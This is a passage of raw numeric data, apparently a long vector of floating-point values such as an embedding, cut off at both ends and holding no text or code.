1816,-0.01689091,0.005827313,-0.018186621,0.008561761,-0.013499945,0.01656545,0.02023517,0.017868008,-0.014114854,-0.006931782,-0.0012383359,-0.013875452,0.018339308,-0.005149453,0.009257851,0.0048984694,0.014518666,-0.006438641,0.003162879,0.0048899595,-0.005138373,0.015060983,0.009060313,-0.01287474,-0.0007071895,-0.00713858,-0.01934606,0.00910738,-0.012726225,-0.0172804,0.011519808,-0.0011225526,0.034165908,0.0031923538,0.0047945464,-0.012685042,-0.0024371354,-0.008417015,-0.019597925,0.028219853,-0.01879733,-0.014887753,-0.011081637,0.007813659,0.021872297,0.03635331,-0.014629825,-0.007362795,0.00702052,0.00838795,-0.005591001,0.05803095,-0.0021294286,0.014180253,-0.01259437,0.0020684258,0.0063591334,0.0019598987,-0.003216368,-0.017489873,-0.02407824,-0.036302675,-0.0092488155,-0.008119281,-0.011041125,0.0011096292,0.0065524955,-0.017946482,-0.008024054,-0.005281862,-0.0060451063,-0.017734548,0.0074424907,-0.007832824,0.005518878,-0.007860407,0.0010188004,0.0023144064,0.012285564,-0.0054802685,-0.014798918,-0.00051385036,-0.018127995,-0.015437601,-0.0031490782,0.0045830053,0.00327091,-0.00248095,0.009832868,-0.0017881518,-0.013432267,-0.010235085,0.0009232021,0.008656557,-0.005304722,-0.0035286297,-0.01340815,0.009465956,0.009916638,-0.023646994,-0.0073582972,0.00489093,0.00622587,0.025291977,-0.008120275,-0.015603208,0.0007762565,-0.013971972,0.0049426225,-0.014915506,-0.0271912,-0.011028811,0.012716011,0.0014076635,0.015014552,0.010277966,-0.0062390277,0.012491023,-0.018041877,0.01474929,-0.014444661,0.04341096,-0.0072226906,0.019755369,-0.0071114865,0.012082827,-0.0061052386,0.00035345857,0.015889522,0.020676576,-0.0065730913,0.0093371635,0.013811076,-0.0040177656,-0.010452156,-0.004499455,-0.0062800273,-0.024134746,0.0071053794,-0.012869168,0.00306562,-0.013218967,-0.01402688,-0.018805549,0.03530411,-0.007812202,0.013373917,-0.004123837,-0.0038296727,0.0038773385,-0.009511247,-0.008373815,0.030400109,0.010473434,-0.018193493,-0.0012244184,-0.0010016476,-0.0038753129,-0.021757208,0.010384843,0.029032802,-0.004394082,0.03561288,0.00551468,-0.0072427746,0.00232381,0.016547346,-0.007915261,-0.00089102285,0.016983401,-0.014301963,0.006501594,-0.019073095,-0.02704709,-0.0018909441,-0.016834285,-0.009421184,-0.017448673,0.065517694,-0.010322015,-0.010875845,0.007052867,-0.006721334,-0.013273018,-0.020655287,-0.016506149,-0.0030997081,-0.03577091,0.021312015,-0.0036900942,-0.019937916,0.011298542,0.005659178,0.029021649,-0.01750353,0.020251356,-0.07665122,0.01739353,0.03233026,-0.020134415,0.008758822,-0.0015234293,0.022527082,-0.022803146,0.00064074114,-0.0017868915,0.00038988472,0.002518984,-0.010754942,-0.004659581,-0.015270802,0.008406693,0.0055205394,-0.013649751,-0.027048998,-0.007652083,-0.01791433,0.015102076,-0.019337518,0.004923333,-0.012824799,-0.036819484,0.0060000867,0.014386296,-0.0021846911,-0.002388884,0.014691553,-0.02106211,-0.00700577,0.008788946,-0.018617732,-0.017963162,-0.02072467,0.0067183496,0.017322173,-0.006970587,-0.011483333,0.017686106,-0.006819464,-0.009301098,0.013620948,0.021019159,0.0071970248,-0.011238152,-0.010083229,0.013067943,0.009849248,0.003808493,-0.04362889,-0.005770792,-0.013860807,-0.026681688,0.011278479,0.033238687,-0.021523727,0.019364402,0.022200393,0.017410506,0.0039257905,0.0014128634,-0.013557024,-0.0085176295,-0.0039003056,-0.006480268,-0.03335316,-0.015412904,-0.017779434,0.009932106,0.011795092,0.02400829,0.0025994142,-0.0011852658,0.006728621,0.018688522,0.00082721986,-0.010925594,-0.011959208,-0.029854214,0.011836522,0.027035445,-0.015625915,-0.0032587757,-0.016592558,0.008956413,-0.019827023,0.023171058,-0.026581781,0.0038165506,0.00093645405,-0.0027355175,-0.007836983,-0.014900566,-0.027128225,-0.0001772643,0.00018207279,0.02015246,0.020605683,0.024094839,-0.029159723,-0.002277537,0.004211323,-0.0016654745,-0.0113273235,-0.00532148,-0.007823308,-0.016769962,-0.0014558327,0.030826729,-0.017946778,-0.002468732,0.017561123,0.013180773,-0.008455864,0.019109614,0.01416987,-0.017592069,0.013104215,0.008089964,0.025232248,0.0046621286,0.034948252,0.010016489,0.005804805,-0.00017644117,0.020688122,-0.01304023,0.018476332,-0.02185298,-0.010197583,0.026905121,-0.003496627,-0.0013640062,-0.0038962131,-0.008375218,0.009165758,0.00022446623,-0.011133891,-0.001441622,0.012136998,-0.027984934,-0.02516738,0.04080484,-0.002956539,0.015832119,-0.00005305127,0.017378315,0.021067856,-0.0077985707,0.018779011,-0.011782879,-0.009884135,0.015834609,0.026437629,-0.005513118,0.0044466658,-0.0070756944,-0.00987577,0.0028760638,0.022923984,0.0046951524,0.0009842694,-0.024284994,-0.006434774,-0.024590066,-0.010205449,0.01391302,0.006216857,-0.01005048,0.0129998345,0.019853266,0.008924811,-0.0037984478,0.008027524,-0.007574182,-0.017506862,-0.009752383,-0.010712652,0.012392462,-0.0035515823,-0.014739124,0.016324136,0.012519403,0.011592713,0.014850339,0.0037776488,-0.007242932,-0.01669134,-0.0033972654,0.00516659,-0.019151619,0.038552765,0.02155084,0.013001162,0.001056596,0.015083289,0.012038192,0.01806544,-0.02143315,0.0115638785,-0.011083209,0.017043913,0.023326786,-0.026217354,0.013976158,0.022692317,0.02967337,0.010630875,-0.040151216,0.048848517,0.029531578,0.036649227,0.0055696154,-0.02713369,-0.031039381,-0.010809338,-0.014818734,0.039271057,0.014370665,0.010263908,0.007262955,-0.00433504,0.0044416874,-0.011414915,-0.0062426496,0.042936526,0.0069562956,0.0076421746,-0.0052260477,0.0075064916,-0.007488129,-0.008175353,-0.008855559,-0.018927837,0.0069272122,-0.026183523,0.010397649,0.012798097,0.027845468,-0.021016613,0.02433425,0.012273868,0.011412404,-0.021324946,-0.0054463893,-0.0011311739,-0.011486999,0.01756288,0.008183833,-0.012816506,-0.000020183883,-0.011596695,-0.008437752,-0.021178592,0.00009403962,0.01824326,-0.014908338,0.0028402035,-0.008829836,0.021716224,0.007966603,-0.019648675,-0.0075028315,-0.015102655,-0.0074291616,0.0143841,0.026016768,0.021249628,0.0062199268,0.033768523,-0.016058037,0.025729438,-0.011072626,0.014161146,0.0038328627,0.018006178,0.016061535,0.0050495625,0.00818981,-0.036629528,-0.023844212,-0.0110183135,0.009673201,-0.019316293,0.024095757,-0.0017197491,-0.006275375,-0.005689398,0.0061744624,0.01714888,0.0059649656,0.0038828042,0.01593903,-0.0015719555,0.03286124,-0.0064883954,-0.00048986694,-0.0155406045,0.008156301,-0.007952982,0.016009293,-0.01265876,0.014447012,-0.0063197576,-0.027499072,-0.007960855,0.026774608,-0.023163969,0.013964989,-0.007307168,0.006439553,-0.0063886773,0.019352177,0.05649136,0.0044707702,-0.03697233,-0.008640528,0.025372364,0.006210575,-0.0037569767,-0.0013339487,0.002802813,-0.0056163566,0.014382773,-0.022802835,-0.0055258544,0.0030679854,-0.0005059514,-0.004974656,0.0044590784,-0.02826001,-0.005729138,-0.02069277,0.0010172966,-0.0096500665,-0.046871156,-0.041330945,-0.0056230645,-0.00587195,0.013876313,-0.007492344,0.030278526,-0.0036292328,-0.02052191,0.0022521415,-0.0012915555,0.0013471247,0.002840425,0.0037308007,0.014085762,-0.010076716,0.005983374,0.048076753,0.0054236627,0.010762474,0.040210336,0.025864389,0.00097585033,-0.022539,-0.023212498,0.012982644,0.0012124352,-0.0060538775,-0.0031267153,-0.008844997,0.005875017,-0.0047640186,0.01427048,-0.008450565,0.02950119,0.013841277,-0.0002097247,0.013158285,0.0086316,0.014615377,-0.0023798633,-0.024912959,0.000070186,0.0017386725,0.01728213,-0.027989803,-0.006705216,-0.016696798,0.0029603315,0.009730725,0.03092432,0.017093236,0.00096917886,0.016417975,0.02008311,0.024557633,0.021250386,-0.0018644438,0.004777808,0.0035653503,0.0034634033,-0.010677842,0.00096118706,-0.0025736738,-0.001458944,0.011513506,-0.0069161826,-0.02458972,0.024673698,0.01730714,0.006356723,0.0043611685,0.014443705,-0.006615488,0.014560581,-0.001074231,-0.0036969914,-0.0045670774,-0.0034447184,-0.04990464,-0.00488159,0.02977165,0.01034944,0.00715881,0.015288599,0.0072403867,-0.009276846,-0.0005081223,-0.011793298,-0.109348096,0.016335422,0.02606068,0.01198698,-0.021718703,0.07120226,-0.03908733,0.019846037,-0.005586521,-0.005249472,-0.0027900848,0.004246334,-0.0024158119,0.0039366,0.015471648,0.007185425,-0.017451277,-0.012701736,-0.0007978798,-0.023869112,0.0022554626,0.022743465,-0.006057475,0.019729247,-0.010746088,0.029154073,-0.004325083,0.009920467,0.022420453,-0.014145377,-0.008427958,0.003268514,-0.015542967,-0.020773971,-0.009466383,0.008273507,-0.007515668,0.010192121,0.0067512267,-0.011313978,0.015939634,-0.018175425,-0.00979066,-0.011671265,0.0007328012,0.00918796,-0.034466263,0.022245761,-0.029258437,0.027605595,-0.015039023,0.0064915973,-0.0076056034,-0.006929573,0.00859009,-0.0072802166,-0.018287756,0.021937001,-0.0046513556,-0.009161189,-0.00095975184,0.01474867,-0.00506171,-0.0007686694,0.004314666,0.013426469,0.008637241,0.0023065584,-0.001665465,-0.00079168385,-0.008600507,0.0129280975,0.0026460032,0.0034490032,-0.0022238614,0.0018831238,0.002285459,0.015337367,-0.0118064415,0.01136184,0.035659123,-0.018503297,-0.028230064,0.00638887,0.009354937,-0.026898779,0.028281625,-0.00832973,-0.018396337,-0.03030709,-0.020030158,0.0010696979,-0.019147316,-0.004687071,-0.012748054,0.005434958,-0.02235287,-0.032644164,-0.0067396187,0.026908325,0.03181798,-0.012191806,-0.010366446,-0.005973725,-0.015429598,-0.009437559,-0.031243129,-0.008729828,-0.0076304297,0.023511948,-0.013553876,0.030684426,0.002186149,-0.016094148,0.018855704,0.04104875,0.00078393216,-0.00052507536,0.0020752866,0.012361104,0.021152278,0.035796195,0.0037932221,-0.023875525,-0.0006557737,0.0026579972,-0.017076414,-0.020524573,-0.011127395,0.043068036,0.033755656,-0.011248994,-0.0294486,0.0029343094,-0.011896866,-0.014752334,0.02368449,-0.021545308,-0.009890997,-0.00035451748,-0.0035779667,-0.020320393,-0.017127855,-0.016920215,0.0292704,0.0050161146,0.005358412,0.0011686957,0.0010221885,0.0070296815,0.010801935,0.017876893,-0.023299674,-0.011262002,-0.0045689982,0.027147619,-0.0075419815,0.004946744,-0.0021904763,-0.019716516,-0.016811281,0.004009522,0.008261601,0.0067667137,0.008895949,-0.015700515,-0.04070565,0.006405604,0.0031709496,0.011316778,0.009755421,0.0059088534,-0.020980483,-0.03701602,0.009889056,-0.016763607,-0.019894283,0.0055110096,0.00073179405,-0.013213483,0.0021589284,-0.031221116,-0.03089318,0.0068608774,0.008601137,0.0058012726,0.03138087,0.0012103685,-0.013781161,-0.013628808,0.0005641355,0.01177591,0.007834786,-0.026566679,0.0006840602,0.0028993036,-0.0022116154,-0.005567745,-0.0033316696,-0.0073966025,0.040436592,-0.010005511,-0.027861642,0.0145480735,0.004256853,-0.008534697,-0.030841393,-0.015203709,-0.00628816,-0.038172722,0.007334589,-0.0028568464,0.005899544,0.0003653284,0.0134211145,0.016065495,-0.0009994332,0.024237419,0.006665057,-0.007152683,0.0145117855,0.0054973247,0.0125504965,0.008521003,-0.0011062176,-0.009807439,-0.013153606,0.024376098,0.0070358776,-0.0025694554,0.007897571,0.00843934,-0.00029703986,-0.015488744,-0.0013771798,-0.017543023,0.0049456917,-0.0027428425,0.0093403505,-0.009972819,0.00356363,0.006849565,-0.022101508,-0.0050615156,0.0007529654,0.0126596745,-0.014145905,-0.015212736,-0.030842917,-0.011071633,0.014340404,-0.038133472,0.014247065,-0.015896007,0.014168552,0.013801625,0.008128565,-0.011870299,0.009649005,0.0026791731,0.022227127,-0.020891938,-0.0018835438,0.0046258504,0.034337368,0.0049602143,0.0016228581,-0.014361465,-0.00021353226,0.009372792,-0.00068836537,0.017162906,-0.011227731,0.008619218,-0.005696808,-0.016897492,-0.002252732,-0.00037445765,0.0062814727,-0.02576726,-0.014083814,0.023291394,0.039852306,-0.036953866,-0.0006058239,-0.028665243,0.004265279,0.024781998,-0.013680509,-0.0187383,-0.0000434858,0.008433874,0.0040400694,-0.019469675,0.015629523,-0.013085646,-0.046442725,0.029015675,0.013500102,-0.017841488,0.01081751,-0.021306513,0.0071461624,-0.020642744,0.025775561,-0.017222604,0.00096096954,-0.0045657977,-0.000634912,-0.0075071263,-0.013621085,-0.018855626,-0.034139983,0.02152288,0.0033463698,-0.014769125,-0.0007146856,-0.0045255376,0.00008253071,0.0064986222,0.018717049,-0.014596298,0.018322863,-0.010536721,-0.013398418,0.0041599334,0.017269976,0.017546738,-0.002755396,-0.015515731,-0.007927443,-0.052920252,0.004787899,0.014719727,-0.021610398,0.00065482175,-0.006881512,0.027023442,-0.002822896,0.023528421,0.00055805815,-0.014635179,-0.011466922,-0.017150605,-0.004257795,-0.022883635,0.022156144,-0.017431622,0.00044116683,0.038338978,0.007833603,0.025291549,0.006667224,0.0042903568,0.0022648189,-0.004416263,0.011636746,-0.0041539883,-0.0067683756,0.023310332,-0.006703026,-0.024289822,0.0024968938,-0.01611806,0.029953472,0.025704661,-0.02744614,-0.0035213684,-0.013660414,-0.003236194,-0.012779172,0.017082436,0.024262248,-0.00956456,-0.0068086237,-0.0009352307,-0.017738715,-0.011359388,-0.009159712,0.003740513,-0.018261703,0.018120065,-0.015750777,0.01658198,0.0110691,-0.024742903,-0.007639279,-0.022968113,0.005405105,0.030774875,-0.015785467,0.025925405,0.00003768765,0.04937754,0.0062470282,0.010745769,0.015031019,-0.007378018,-0.033822227,0.00027218153,-0.0034714965,0.0007714349,-0.023249678,-0.027097277,0.019807471,0.012456085,-0.016464934,-0.0069936384,0.00019906332,-0.0073211207,-0.009933257,-0.015767712,-0.010885824,0.023023106,0.064707845,-0.0005304107,-0.012975204,-0.02375754,0.03093859,0.0063604177,-0.0019393412,-0.006920027,0.0054888143,-0.004790383,-0.010921289,-0.005322498,-0.024737502,0.015273297,-0.004732033,0.0043479768,-0.0005215363,-0.0015086458,-0.021832908,0.014606178,0.0074260077,0.014815089,-0.009478754,-0.02835121,-0.041655995,0.008534909,-0.024791192,-0.008902559,-0.004141914,0.004556418,0.010097838,0.016039627,0.015806165,-0.0045947954,0.011369553,-0.03152174,-0.010173164,0.0071155834,0.0006409034,-0.0020949692,-0.00946156,0.026014343,-0.024135929,0.004241572,0.0061294492,-0.015783286,0.002482499,-0.034402438,-0.02563173,-0.0017205946,-0.012363518,-0.022541868,0.010648342,-0.018222833,0.0143065965,0.019955086,0.047281187,-0.0055963956,0.025003726,0.028008733,0.004590991,0.008541697,0.023125373,0.016716316,0.0061062267,0.010689216,0.022610227,0.00031877423,0.000092714676,-0.020172916,-0.023870122,-0.018141383,0.0026287986,0.035551276,-0.021528563,0.0077981753,-0.020925594,0.0056157643,-0.004256322,0.01390614,-0.027333817,0.013438355,-0.013005167,0.01154735,-0.002025902,0.0011930772,-0.012933005,0.01934179,0.023595098,-0.01679733,-0.0027550398,-0.008740403,-0.0065948353,0.004808103,-0.015208446,0.011548948,-0.00038213553,-0.019014357,-0.0001798303,-0.00910651,0.038844157,-0.0310708,0.0028674477,0.0074151424,-0.012808884,-0.026380626,0.007930483,-0.027088638,0.02490333,-0.0002295585,-0.0014855382,0.0022859972,0.006105693,-0.044616032,0.010770011,0.0013776524,0.0032758662,0.010531972,-0.004878334,-0.017376794,-0.019796675,-0.011992301,-0.00396605,0.0260005,0.00813672,0.017323902,0.017403023,0.031020721,0.0045504286,-0.0144801475,-0.0043679667,0.004834279,0.0070031853,-0.002018212,-0.00093357434,0.005835779,-0.030720944,-0.0070400354,0.008111023,-0.026787011,-0.004185904,-0.0058989795,-0.009790591,-0.017937453,0.0010775686,0.0138678225,0.015662644,-0.002910227,0.014454666,0.029025927,0.005815062,-0.008170014,0.00032515882,0.0022656077,0.026159808,-0.009526752,0.00006773634,-0.005118675,-0.013912334,-0.01008735,0.007932004,0.03207913,0.008553593,-0.00897681,0.02485169,-0.028648894,0.004254123,0.023585238,0.0069931564,-0.053938653,0.016682655,-0.01117388,-0.0048430166,0.01800675,0.0038326676,0.0340982,0.01582903,0.011136893,0.021477005,-0.029130496,0.026649805,-0.022618787,0.06960682,-0.011171151,-0.0037852658,-0.005390075,-0.018392447,0.006494912,0.002783772,0.016088627,0.012959449,-0.008470137,-0.0330059,-0.015491872,0.008822568,-0.029822722,-0.004445407,0.010370766,-0.008108495,-0.020249084,-0.00010589073,-0.0017072124,0.014290005,0.000795516,0.0017957403,0.016999219,-0.023844693,0.029302446,0.015941352,0.023749297,-0.010014375,-0.012058666,0.0012197639,-0.022377418,-0.009673381,-0.00023502312,0.0097763315,0.014304522,0.010839191,0.0031809914,-0.01479221,0.000680637,0.0098163765,-0.013578133,0.076982915,-0.008590174,0.011059175,0.001743856,0.0032821312,0.010852672,0.033769667,0.012799791,0.037571326,0.01641303,-0.0032061106,0.004501769,0.019616665,0.019159792,0.016146729,0.010042305,0.021499984,0.013162785,0.013605635,0.00037207588,-0.0330534,0.00442521,-0.0097755715,-0.014519038,-0.0022884808,-0.027426073,0.006444701,-0.040248103,-0.017456554,-0.0024378134,0.0028482105,-0.01718029,0.015213176,0.007856669,0.03899072,-0.011173406,0.0057685985,0.004749642,0.012617514,-0.03592933,0.043163694,-0.018823436,-0.01235932,-0.010283507,0.014829507,-0.02569476,0.0690211,0.018161278,0.017552247,0.006853548,0.0046774177,0.028129417,-0.01208838,0.009859662,0.012993543,-0.0015203566,0.016636932,0.0005578857,-0.014420295,-0.0042596716,0.017362475,0.0024821411,-0.006081377,0.01915742,0.017357068,-0.009426767,-0.019652644,0.027192835,0.0030051116,-0.0037288181,-0.027102381,0.0030254913,-0.005453142,0.011167048,0.03348029,-0.008883356,-0.01207483,0.0022452336,0.007480429,0.026638508,0.0066879755,-0.042854957,-0.0035881095,0.15131429,0.0013502814,0.01567468,0.0039661448,-0.004561501,0.013201031,-0.0642096,-0.01823533,0.011546726,0.009166488,-0.016035302,-0.012624645,-0.018928032,0.01189935,0.015260484,0.020959405,0.025564637,-0.034988083,0.028773665,-0.008693072,0.022240868,0.007824635,0.01728847,-0.009292499,-0.022195315,-0.012300586,0.008619877,-0.0063298866,0.006633851,0.0051150466,0.01516211,-0.011379475,0.020161144,-0.0072369226,-0.026195142,0.0023727338,0.0068572187,0.0059891366,-0.00058044144,-0.020856418,-0.018285759,0.0060319137,-0.018165775,-0.04023535,-0.10436258,-0.0005268473,0.01732285,-0.03674264,0.001318018,0.013192443,0.008638023,-0.008924923,0.005991903,-0.025367102,0.01430091,-0.012667691,0.02071649,0.007344642,-0.017550692,-0.0004645905,-0.022229807,-0.0012426876,0.01769312,-0.0035260103,0.01054762,0.010459954,0.0109561505,0.00011721097,-0.006647114,0.0048212004,-0.022076538,0.023556301,-0.037697997,0.012537463,-0.014507166,0.021638785,-0.010448473,-0.0049618334,-0.04023827,-0.022836259,-0.0033836209,0.0027201946,-0.017139724,0.017563296,0.012700275,-0.013193944,-0.0007977954,0.0070763533,0.006136638,0.032318443,0.022237249,0.0121989325,0.0019048365,0.02998981,0.03825353,0.008628535,-0.01683116,-0.0010338931,-0.02122496,-0.008467591,0.00044281402,-0.0060406392,-0.0045418884,0.0076760924,-0.006407236,-0.025477715,0.00081251597,-0.014036358,0.031687003,-0.009516914,-0.019510701,-0.02158981,0.0062522567,-0.0013997973,-0.001670658,0.0016465964,0.023334421,-0.030100632,0.014431964,0.040065188,-0.0070905806,0.004921587,-0.0013718375,-0.0117929485,0.022149684,-0.030799925,0.0072746114,-0.015481869,-0.016258748,0.0006471769,-0.00622646,-0.020236121,-0.006094492,0.0026049295,0.0054189926,0.009812804,0.023886904,0.008096713,-0.03596644,0.025076061,0.0041455957,0.023279505,-0.02216682,0.009396234,0.0043033417,-0.005979094,-0.029142452,0.030830367,-0.01007203,-0.0051052817,-0.002650877,-0.022570629,-0.0013535345,0.0048186346,0.004379228,0.017735653,-0.0022388368,-0.032278344,-0.020298636,-0.04493337,0.021237465,-0.00068049243,0.021173673,-0.0059539624,-0.0261336,-0.0028592078,-0.006422033,-0.0013475106,0.038378373,-0.017136805,-0.044338766,-0.0008103786,0.0100425,-0.011800624,-0.011147755,0.018950544,-0.006167279,0.0027515595,-0.013192772,-0.0013763381,0.002441484,-0.0032091166,-0.03770158,0.032914624,0.010032513,-0.037430387,-0.0006913193,-0.015782919,0.03432533,-0.012339042,0.024485769,-0.005223062,0.014490554,-0.0134249795,-0.019483598,0.045485605,-0.0046140295,-0.045884,-0.014830156,0.07756086,0.00015554135,-0.01836049,0.0037372143,0.004456992,0.00933185,0.020939207,-0.016132234,-0.007305412,-0.020073341,-0.022941718,0.0020320532,-0.0032361255,-0.009031413,-0.003988941,0.0023672075,0.0015542662,0.009935319,-0.009030142,-0.016190607,0.009840278,-0.013686342,-0.0030848158,0.036506135,0.033796486,-0.018374829,0.0024639594,-0.012980169,-0.008878014,0.0038868682,0.006566315,-0.004685871,0.0058518657,-0.007068716,0.0038963743,-0.048064385,-0.005195125,0.019428156,0.0144497985,0.0074791983,0.000012932052,0.022119153,0.008433366,-0.035951674,0.012202827,0.010616891,-0.02893435,0.02006751,0.0067602205,0.016542703,-0.006002092,0.023793763,-0.010584097,-0.027652718,0.013318238,-0.028245384,0.024401188,-0.0027821094,-0.0073439376,-0.0034513117,-0.0023527078,-0.009544688,-0.0016974888,-0.0024488142,0.005445496,0.021999313,0.025187517,0.006581685,0.0024603757,0.015732167,-0.01153368,0.0011220863,0.0041563576,0.022020899,-0.01637397,-0.0046637324,-0.014937017,0.011654168,-0.007416904,0.0023700853,-0.0015073824,-0.0052667297,0.0068789683,-0.0005124903,-0.017109362,-0.06486777,0.008740782,0.0008742001,-0.010381236,0.01759144,0.0060815196,0.006229267,0.028859602,0.0023212566,0.010435632,-0.0115118325,0.0109157665,0.013186496,-0.0033757652,0.020811316,0.0068057464,0.024277799,-0.00447679,-0.0068417126,-0.008639827,-0.018835785,-0.015026057,-0.045923386,0.0019568952,-0.03289008,-0.018326836,-0.01065635,0.017743325,-0.011981638,0.009365389,0.03410879,-0.021531114,-0.01561663,0.02126266,-0.01154038,-0.018870188,-0.02612955,0.0042928127,-0.00017126606,0.08055708,-0.007867161,-0.0068303244,0.0036116496,-0.020311832,0.018260438,-0.0144066205,0.037275594,0.000054004217,0.008870264,0.017469868,0.00013449021,0.006235459,0.01848942,-0.012876053,-0.0011321872,0.0025730843,0.027868647,0.0018603628,-0.027692983,0.021488417,0.0022410508,0.00817224,-0.0022989146,-0.015914368,0.012454202,-0.011667598,-0.03191777,0.00502685,0.0037168802,-0.002745722,0.033542264,-0.017731238,0.011180616,0.0023871744,-0.022306683,-0.012642194,0.03122846,0.014760279,-0.0062723733,-0.021609582,0.016554432,0.016406406,-0.02565581,0.009974795,0.0016176833,-0.010362874,-0.030798143,0.00830645,0.026575938,-0.0024535633,0.012800635,-0.0058612963,-0.012545419,-0.034072913,0.02239221,0.015665095,0.016837837,-0.030306831,-0.004415043,0.020201407,0.0013360674,0.002247137,0.019939749,-0.004095313,0.015111114,0.0010479322,0.011725568,0.035494372,-0.014475543,-0.017373398,0.007336962,0.017981302,-0.02818442,0.011204221,-0.0025122543,-0.009428439,0.029009925,-0.0015048122,-0.032369856,0.020143855,0.00062784774,-0.019855604,0.0011978253,0.0057902243,0.0159384,-0.013696085,0.013749715,-0.009256035,-0.038051106,0.012957332,-0.015880637,0.019397596,0.0055996124,-0.0035680907,-0.037814688,0.003489697,0.0039983294,-0.0062531563,-0.0034903106,-0.03132013,-0.010468501,-0.04981083,0.043278437,-0.0063771065,-0.006609923,0.014789858,0.017518211,0.005539358,-0.014523124,0.018598173,-0.018536624,-0.0050044362,-0.0020873663,-0.025658306,-0.027063701,0.0072885235,0.017411653,-0.026046598,0.0139588,0.0041362327,-0.015150447,0.012498378,-0.010094623,-0.010507673,0.010392302,-0.017275086,-0.026660219,0.015771115,-0.004617794,-0.0153499115,-0.007981837,0.025996162,-0.01829926,-0.0154253775,-0.024030926,-0.014577856,-0.018025734,-0.004230431,0.0035484876,0.0031240988,0.0040908577,0.025402268,0.015071074,0.004891062,0.009853302,-0.037720494,-0.014779928,-0.012117949,0.020532213,-0.023100488,-0.011267782,0.017924681,-0.0037630186,0.010407316,0.0008098942,-0.002614595,0.018299395,0.027812483,0.012879917,-0.015781611,0.0029212276,-0.0010930788,-0.01593938,-0.0093858605,-0.020400304,0.0036162764,-0.0020926292,0.023857279,0.0073757735,-0.027573982,-0.013319253,-0.004982975,-0.017578593,0.032311153,0.0155122345,-0.0109501155,-0.0006703861,0.0050218925,0.0075391117,-0.020574948,-0.0044262134,-0.0100423675,-0.026978876,0.014577076,-0.026069999,0.009186323,-0.0031982036,-0.004960416,-0.030573579,-0.0017831443,0.0051617525,-0.015272398,0.028099129,-0.0005241546,-0.010375535,0.0055399355,-0.012795477,-0.011143633,0.007134511,0.014855044,-0.0033409246,-0.026116477,0.00044679746,-0.007146406,0.013361945,-0.0052711847,-0.015968928,-0.02496124,-0.14182535,0.005680131,0.0137083195,-0.039113984,-0.0053607933,-0.0024365294,0.020441644,0.050527915,0.0040064673,-0.0016448486,-0.0017275081,0.026944581,0.01809824,-0.013795764,-0.0009412961,0.009991352,-0.0056183035,-0.0196735,0.0028401953,0.007979869,0.0171678,0.020258667,-0.021942504,0.0036785835,-0.009156052,0.024794705,-0.012621028,0.020673713,0.021705735,0.021786049,0.0012424559,0.0044330335,0.003494514,0.016044654,-0.02171801,0.009866623,0.00838895,0.029986735,0.021474604,-0.0012145506,-0.0077192904,-0.016299143,-0.0038059314,0.053330306,0.0094673885,0.0057010506,0.014446034,0.00221952,0.0021458762,-0.00823615,-0.006384647,-0.0124189295,0.019562725,0.01130813,-0.0042101997,-0.018631564,-0.028008997,0.0027277118,0.0029314407,-0.0016601458,0.008832593,0.010522518,0.008243511,-0.0131672,-0.0064155464,0.0015128882,0.006149948,-0.008681671,-0.018651728,-0.003793479,-0.011197547,0.020785881,-0.0014377162,0.008181492,-0.014312016,-0.01172506,0.029182747,0.011237735,-0.0049178465,0.0006991618,-0.004244789,0.0041905516,0.0044315117,0.015601603,0.0055018077,0.009902856,0.0055778273,0.009012145,-0.013950083,0.0056328974,0.002338589,0.0029990848,-0.021418756,-0.032580204,0.03181358,-0.0024058302,-0.013627435,0.040447038,0.020559298,-0.014713157,-0.0011225268,-0.012234624,-0.01987003,-0.012525539,-0.11093859,-0.007915034,0.027996397,0.008847784,-0.00439951,0.007748616,0.009206015,0.00035100014,0.012453606,0.027339196,-0.0065302327,0.02322714,0.010398655,0.005333631,-0.0069986554,0.021056842,-0.023388445,0.008764544,0.008831266,-0.0029093141,0.011763341,-0.01046582,-0.020922484,0.0058899177,0.028667128,-0.008373025,-0.009320084,0.021371415,0.02606498,-0.022373144,-0.006381816,0.0055224337,0.005068378,0.00090460374,0.0035943603,-0.024797698,0.015002476,0.008761974,-0.0032688624,0.011866346,0.0154583305,-0.011169048,-0.0034482891,0.0045121866,0.0007480689,0.012273176,0.013391734,0.00006323184,0.019020954,0.022232294,-0.01878576,0.019743416,0.002818682,-0.011684797,0.0031815444,-0.004930933,-0.009644375,0.009748091,-0.00819712,0.022023642,-0.0038757136,0.023763558,-0.0054507335,0.008873229,0.0058323634,0.031514097,0.018770205,-0.008320587,0.01565285,-0.010417793,-0.017710555,0.023914129,0.019953694,-0.0007431681,0.012353795,0.016357915,0.012221536,0.031181017,0.02741845,-0.0028536313,-0.017387055,-0.011239017,0.0004973995,0.015287681,-0.01641706,-0.012399801,-0.004489091,0.03356327,0.0068002734,0.013907986,0.0029451833,0.009618958,-0.010196899,0.021212386,0.022423437,0.0048193,0.021923969,-0.012627118,-0.006070849,0.0013455639,-0.03170215,0.009976757,-0.0073757814,-0.0030523133,-0.030895239,0.00019241676,-0.01440597,0.0049467273,-0.008927555,0.0030962524,0.0050442233,0.020676516,-0.02460971,0.010811865,-0.027283171,-0.0010147674,-0.010302998,-0.012960522,-0.0322284,0.016015273,0.0041295486,0.031239374,-0.011796073,0.0014513943,-0.029514316,0.00882852,-0.020609096,0.018693196,0.015093654,0.00067973504,-0.0069464343,0.015427087,0.010738328,-0.024911389,-0.005823214,0.0168815,0.005894035,0.0060030846,-0.0013463526,-0.0075350115,-0.00917894,-0.020423284,0.018705651,0.0151544595,-0.0052923104,-0.016635217,-0.0030418846,0.019145777,-0.0008650919,0.015924739,-0.012053048,-0.015757537,0.0014839579,0.011614014,-0.017811058,0.0057697254,-0.021376565,-0.009003426,0.0029321115,-0.005912535,0.002683745,0.006096982,0.0018685136,-0.012260505,0.0065515568,-0.023221413,0.008512746,-0.003439059,-0.010565958,-0.006892994,-0.014038339,-0.013459291,0.0018521242,0.005477357,0.020989884,0.040891495,0.019215383,0.020884518,0.014761243,0.020459492,0.029143985,0.013364261,-0.023635248,0.005010163,0.008265725,-0.0018142847,-0.01091264,0.024741327,0.006811058,0.0029781836,0.013667132,0.010536964,-0.0035700917,0.006300086,0.008810977,-0.0055496576,-0.010518165,0.0016104804,0.003326474,-0.014542664,-0.01132986,0.025991417,0.012235369,-0.0072367466,0.0073451307,0.007969092,0.0034766083,0.027809177,0.035177853,0.002121005,0.012001625,-0.020421352,0.015364496,0.0027630364,0.019763205,0.045032807,-0.017145999,-0.025592202,0.006853435,0.012211605,-0.021357248,-0.020122528,0.015210399,0.0069400244,0.009318354,0.040899422,0.008541652,0.0010347479,-0.011102866,0.0020676488,0.011317079,0.043084744,-0.008724194,0.0030271618,-0.0029332319,0.0059172744,0.02